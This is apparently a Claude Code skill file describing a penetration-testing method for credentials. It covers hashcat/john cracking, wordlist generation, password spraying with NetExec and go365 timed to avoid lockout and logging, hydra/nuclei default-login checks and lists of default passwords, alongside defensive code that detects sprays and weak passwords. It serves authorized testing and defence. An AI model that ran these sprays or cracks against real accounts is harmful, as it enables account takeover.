---
name: pentest-credentials
description: Credential testing methodology, covering hash crack selection, wordlist generation, password spray (advisory) and default cred audit. Triggers on credential testing, hash crack, Hashcat, John the Ripper, password spray, wordlist generation, cupp, CeWL, Crunch, hashid, default password, credential stuffing.
license: MIT
compatibility: Works with Claude Code
allowed-tools: Read Write Edit Bash Grep
metadata:
  author: badi
  badi-version: ">=1.24.0"
  category: pentest
  scope: advisory
  inspired-by: 0xSteph/pentest-ai-agents credential-tester
---

# pentest-credentials

Credential testing methodology: offline hash cracking, targeted wordlists and default credential audit. Online brute-forcing requires a declared scope and awareness of the account lockout policy.

## Triggers

- "I found a hash, how do I crack it"
- "crack with hashcat / john"
- "build a wordlist"
- "password spray"
- "default cred audit"
- "credential stuffing test"

## Hash Identification

```bash
# hashid (offline)
hashid "$2y$12$abcd..."                       # bcrypt detect
hashid "5f4dcc3b5aa765d61d8327deb882cf99"     # MD5

# haiti (modern alternative)
haiti "$2y$12$abcd..."
```

Common hash modes (hashcat):

| Hash | Mode | Example Command |
|------|------|-------------|
| MD5 | 0 | `hashcat -m 0 hash.txt wordlist.txt` |
| SHA1 | 100 | `hashcat -m 100 ...` |
| bcrypt | 3200 | `hashcat -m 3200 ...` (slow) |
| NTLM | 1000 | `hashcat -m 1000 ...` |
| NetNTLMv2 | 5600 | from Responder |
| Kerberos AS-REP | 18200 | from GetNPUsers.py |
| Kerberos TGS-REP | 13100 | from GetUserSPNs.py |
| WPA2 (hash22000) | 22000 | from hcxpcapngtool |
| MS-SQL 2012+ | 1731 | T-SQL hash |
| LSA secrets | 5500 (NetNTLMv1) | Responder |
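The table above is what a practitioner reads off `hashid` output by hand. The following is an added example, not code from this skill or from hashid: a minimal format classifier that maps a hash string to every candidate in the table together with its hashcat mode, so an ambiguous 32-hex string (MD5 or NTLM) is reported as both rather than silently picked. The sample hashes at the bottom are constructed for the demonstration and are not real credentials.

```python
import re

# Regexes for the hash formats in the table above; the mode numbers are hashcat's.
# Order matters only for readability: every matching pattern is reported.
PATTERNS = [
    ("bcrypt",                     3200,  re.compile(r"^\$2[aby]\$\d{2}\$[./A-Za-z0-9]{53}$")),
    ("Kerberos 5 AS-REP etype 23", 18200, re.compile(r"^\$krb5asrep\$23\$")),
    ("Kerberos 5 TGS-REP etype 23", 13100, re.compile(r"^\$krb5tgs\$23\$")),
    ("WPA-PBKDF2-PMKID+EAPOL",     22000, re.compile(r"^WPA\*0[12]\*")),
    # user::domain:server_challenge(16 hex):NTProofStr(32 hex):blob
    ("NetNTLMv2",                  5600,  re.compile(r"^[^:]+::[^:]*:[0-9a-fA-F]{16}:[0-9a-fA-F]{32}:[0-9a-fA-F]+$")),
    ("SHA1",                       100,   re.compile(r"^[0-9a-fA-F]{40}$")),
    ("MD5",                        0,     re.compile(r"^[0-9a-fA-F]{32}$")),
    ("NTLM",                       1000,  re.compile(r"^[0-9a-fA-F]{32}$")),
]


def identify_hash(h):
    """Return all (name, hashcat_mode) candidates whose format matches h."""
    h = h.strip()
    return [(name, mode) for name, mode, rx in PATTERNS if rx.match(h)]


def hashcat_commands(h, hash_file="hash.txt", wordlist="rockyou.txt"):
    """One hashcat invocation per candidate, so an ambiguous hash is tried in every mode."""
    return [f"hashcat -m {mode} {hash_file} {wordlist}  # {name}"
            for name, mode in identify_hash(h)]


# Constructed samples for a stand-alone run (the MD5 one is the well-known MD5 of "password").
SAMPLE_MD5_OR_NTLM = "5f4dcc3b5aa765d61d8327deb882cf99"
SAMPLE_BCRYPT = "$2y$12$" + "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0"
SAMPLE_NETNTLMV2 = "alice::CORP:1122334455667788:" + "ab" * 16 + ":" + "cd" * 40

if __name__ == "__main__":
    for sample in (SAMPLE_MD5_OR_NTLM, SAMPLE_BCRYPT, SAMPLE_NETNTLMV2):
        print(sample[:40], "->", identify_hash(sample))
        for cmd in hashcat_commands(sample):
            print("   ", cmd)
```

Run it on any hash from an engagement before choosing a mode; when two candidates come back, the cheap one (MD5 / NTLM are both fast) costs nothing to try first.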

## Wordlist Strategy

### Ready-made Wordlists

```
rockyou.txt              — 14M (classic baseline)
SecLists/Passwords/*     — 1500+ specialized lists
Probable-Wordlists/      — sorted by statistical probability
WeakPass dataset         — large merged collection
```

### Target-Specific Generation

```bash
# CeWL: pull words from the site itself (quiet)
cewl https://example.com -m 5 -w cewl-target.txt

# cupp: passwords from a user profile (offline, interactive)
cupp -i
# Answers: name, dates, pet, company, etc. -> target.txt

# Mentalist (GUI / CLI): rule-based combination

# Crunch: pattern-based (% = digit placeholder; -l marks the @ as a literal;
# min/max length must equal the pattern length)
crunch 11 11 -t Spring@%%%% -l aaaaaa@aaaa > crunch.txt   # Spring@2026, Spring@1990, ...

# hashcat rule sets
hashcat -m 1000 hash.txt rockyou.txt -r rules/best64.rule -r rules/d3ad0ne.rule
hashcat -m 0 hash.txt --increment -a 3 ?l?l?l?l?l?d?d?d  # mask attack
```

### Mutation Rules

```bash
# Common mutation: Title case + year + special
sed 's/$/2026!/' words.txt >> mutated.txt
sed 's/$/123/' words.txt >> mutated.txt
awk '{print toupper(substr($0,1,1)) substr($0,2)}' words.txt >> mutated.txt

# Automated with hashcat rules
hashcat --stdout words.txt -r rules/leetspeak.rule | sort -u > leet.txt
```
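The rules above generate "Title + year + special" and leetspeak variants of a base word. The defensive counterpart, shown here as an added example that is not part of this skill, reverses those mutations instead of enumerating them: a candidate password is normalized (trailing year/digits/specials stripped, leetspeak undone, lowercased) and compared with a base-word list such as the company name, seasons and the defaults listed further down. It goes slightly beyond the rules on the page by also catching two concatenated base words. The `BASE` set and the candidates are constructed for the demonstration.

```python
import re

# Reverse map for the leetspeak substitutions the rule files produce.
LEET = str.maketrans({"4": "a", "@": "a", "3": "e", "1": "i", "!": "i",
                      "0": "o", "5": "s", "$": "s", "7": "t"})
SUFFIX = re.compile(r"[0-9!@#$%^&*._\-]+$")   # trailing year / 123 / special chars
PREFIX = re.compile(r"^[!@#$%^&*._\-]+")     # leading special chars


def normalize(candidate):
    """Undo the mutation rules: strip decorations, de-leet, lowercase."""
    core = SUFFIX.sub("", candidate)
    core = PREFIX.sub("", core)
    return core.translate(LEET).lower()


def matched_base(candidate, base_words):
    """Return the base word (or 'word+word') the candidate reduces to, else None."""
    core = normalize(candidate)
    if core in base_words:
        return core
    # Catch compounds such as AcmeWelcome2026! by trying every split point.
    for i in range(1, len(core)):
        if core[:i] in base_words and core[i:] in base_words:
            return core[:i] + "+" + core[i:]
    return None


def policy_verdict(candidate, base_words, min_len=12):
    """Verdict string a password-change hook could return to the user."""
    if len(candidate) < min_len:
        return f"too short (<{min_len})"
    base = matched_base(candidate, base_words)
    if base:
        return f"derived from dictionary word '{base}'"
    return "ok"


# Constructed base list: company name, seasons and the defaults every spray list carries.
BASE = {"spring", "summer", "autumn", "winter", "welcome", "acme", "password", "backup"}

if __name__ == "__main__":
    for pw in ("Spring2026!", "W3lc0me123", "P@ssw0rd", "AcmeWelcome2026!", "Backup2024", "tr0ub4dor&3"):
        print(f"{pw:20} -> {policy_verdict(pw, BASE)}")
```

Wiring `policy_verdict` into a password-change hook blocks exactly the candidates the spray list in the next section is built from, which is cheaper than detecting the spray afterwards.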

## Password Spray (Advisory, Scope Required)

```
1. Learn the target system's lockout policy
   (typical: 3-5 wrong attempts -> 30 min lock)
2. One password across all users, rotate at 5-minute intervals
3. Outside working hours (logging gets overlooked during the day)
4. Common password list: Spring2026!, Welcome1, Company123
```

```bash
# AD environment (NetExec)
nxc smb <dc> -u users.txt -p 'Spring2026!' --continue-on-success

# O365 / Azure AD
go365 -h o365.com -u users.txt -p password.txt --type spray --delay 300

# Goal: 1-2 hits without triggering lockout
```
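The spray pattern described above (one password, many users, few attempts per user, off-hours) is also its detection signature. The following is an added example, not code from this skill or from NetExec: a detector run over constructed authentication log lines that flags a source once it has failed against many distinct users while staying below the lockout threshold per user, records any success from the same source inside the window as a probable hit, and notes whether the activity fell outside working hours. The log format and every line in `SAMPLE_LOG` are constructed for this example.

```python
import re
from collections import Counter, defaultdict, deque, namedtuple
from datetime import datetime, timedelta

Event = namedtuple("Event", "ts src user ok")
LINE = re.compile(r"^(\S+) src=(\S+) user=(\S+) result=(SUCCESS|FAIL)$")

# Constructed sample: 10.0.0.5 sprays seven users at 02:14 and lands one hit;
# 10.0.0.9 hammers a single account (brute force, not spray).
SAMPLE_LOG = """\
2026-03-10T02:14:05 src=10.0.0.5 user=alice result=FAIL
2026-03-10T02:14:09 src=10.0.0.5 user=bob result=FAIL
2026-03-10T02:14:14 src=10.0.0.5 user=carol result=FAIL
2026-03-10T02:14:20 src=10.0.0.5 user=dave result=FAIL
2026-03-10T02:14:25 src=10.0.0.5 user=erin result=FAIL
2026-03-10T02:14:31 src=10.0.0.5 user=frank result=FAIL
2026-03-10T02:14:36 src=10.0.0.5 user=grace result=FAIL
2026-03-10T02:14:40 src=10.0.0.5 user=dev-test result=SUCCESS
2026-03-10T09:02:00 src=10.0.0.9 user=heidi result=FAIL
2026-03-10T09:02:05 src=10.0.0.9 user=heidi result=FAIL
2026-03-10T09:02:11 src=10.0.0.9 user=heidi result=FAIL
2026-03-10T09:02:30 src=10.0.0.9 user=heidi result=SUCCESS
"""


def parse(log_text):
    """Parse the constructed log format into time-ordered Events."""
    events = []
    for line in log_text.splitlines():
        m = LINE.match(line.strip())
        if m:
            events.append(Event(datetime.fromisoformat(m[1]), m[2], m[3], m[4] == "SUCCESS"))
    return sorted(events, key=lambda e: e.ts)


def detect_spray(log_text, window=timedelta(minutes=10), min_users=5, lockout=5,
                 work_hours=range(8, 19)):
    """Spray signature: many distinct users failing from one source, each below
    the lockout count. A single user with many failures is brute force instead."""
    recent = defaultdict(deque)   # per-source sliding window of events
    alerts = {}
    for ev in parse(log_text):
        q = recent[ev.src]
        q.append(ev)
        while ev.ts - q[0].ts > window:
            q.popleft()
        fails = Counter(e.user for e in q if not e.ok)
        if len(fails) >= min_users and max(fails.values()) < lockout:
            a = alerts.setdefault(ev.src, {"source": ev.src, "first_ts": q[0].ts})
            a["last_ts"] = ev.ts
            a["distinct_users"] = len(fails)
            a["max_failures_per_user"] = max(fails.values())
            a["hits"] = sorted({e.user for e in q if e.ok})   # successes inside the spray window
            a["off_hours"] = ev.ts.hour not in work_hours
    return list(alerts.values())


if __name__ == "__main__":
    for alert in detect_spray(SAMPLE_LOG):
        print(alert)
```

Tune `min_users` and `lockout` to the policy learned in step 1; a spray that respects the lockout threshold is invisible to per-account lockout counters and only shows up in this per-source view.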

## Default Cred Audit

```bash
# Nuclei default-creds template
nuclei -u <target> -t default-logins/ -severity high,critical

# Hydra single test
hydra -L users.txt -P passwords.txt <target> ssh -t 4 -f
```

Common defaults:
- admin/admin
- admin/password
- root/toor
- Cisco/cisco
- Tomcat Manager: admin/admin, manager/manager
- Jenkins anonymous read

## Credential Stuffing Test (Authorized)

- Client's own domain only, historical breach data (HIBP API + paid lookup)
- User credential reuse rate: 5-10% (industry average)
- Test result: how many employees can still log in with old breached credentials
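The HIBP lookup in the first bullet can be done without sending passwords anywhere: the Pwned Passwords range API (`https://api.pwnedpasswords.com/range/<prefix>`, a real endpoint) takes only the first five hex characters of the SHA-1 and returns every matching `SUFFIX:COUNT` line, and the client does the final comparison locally. The following is an added example, not code from this skill or from HIBP. `live_fetch` talks to the real API; `fake_fetch` and `FAKE_RANGES` are a constructed offline stand-in (the count shown is made up) so the block runs without network access, and `audit` is a hypothetical wrapper for the "how many employees" figure.

```python
import hashlib
import urllib.request


def live_fetch(prefix):
    """Fetch one k-anonymity range from the real Pwned Passwords API."""
    req = urllib.request.Request(
        f"https://api.pwnedpasswords.com/range/{prefix}",
        headers={"User-Agent": "credential-audit-example"})   # the API rejects requests without a UA
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode()


def pwned_count(password, fetch_range=live_fetch):
    """Number of breach occurrences of `password`, or 0. Only the 5-char prefix leaves the host."""
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    for line in fetch_range(prefix).splitlines():
        cand, _, count = line.strip().partition(":")
        if cand == suffix:
            return int(count)
    return 0


def audit(accounts, fetch_range=live_fetch):
    """accounts: iterable of (user, password) from an authorized test.
    Returns {user: breach_count} for every password found in breach data."""
    return {user: n for user, pw in accounts if (n := pwned_count(pw, fetch_range))}


# Constructed offline stand-in: the one range holds the SHA-1 suffix of "password"
# (SHA-1 = 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8) plus a filler line.
FAKE_RANGES = {
    "5BAA6": "1E4C9B93F3F0682250B6CF8331B7EE68FD8:123456\n" + "0" * 34 + "A:2\n",
}


def fake_fetch(prefix):
    return FAKE_RANGES.get(prefix, "")


if __name__ == "__main__":
    # Constructed test accounts, checked against the offline stand-in.
    found = audit([("alice", "password"), ("bob", "xK9#vLp2wQ!7")], fake_fetch)
    print(found)   # alice's password is in the (fake) breach set, bob's is not
```

Replace `fake_fetch` with the default `live_fetch` for a real run; the reuse rate in the second bullet is then `len(found) / len(accounts)`.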

## Offline Crack Strategy

```
1. Identify the hash type (hashid)
2. Fast wordlist: rockyou + rules (5 min)
3. Slow down: rockyou + leetspeak + special (30 min)
4. Targeted: CeWL + cupp + mask (1-2 hours)
5. Fail -> Hashcat mask: brute-force 8-10 chars
6. Still fail -> hash lookup / dehash (DB leak)
```

## Output Template

```markdown
## Credential Test — <engagement>

### Hash Crack Results
| User | Hash Type | Crack Time | Password |
|------|-----------|------------|----------|
| svc-backup | NetNTLMv2 | 4 hours | Backup2024 |
| svc-deploy | NetNTLMv2 | (timeout) | (not cracked) |

### Password Spray Results
- Tested: "Welcome1" against 50 users
- Hit: 2 user (4%)
  - dev-test (confirmed after a lockout-avoidance retest)
  - finance-tmp

### Finding Impact
- Crackable password: weak policy (Backup2024, a known pattern)
- Default cred: 4% of users on Welcome1, not changed after onboarding
```

## Out-of-Scope

- Locking out production accounts (exceeding rate limits)
- Unauthorized credential exfiltration (engagement scope only)
- Mass credential stuffing (third-party datasets)
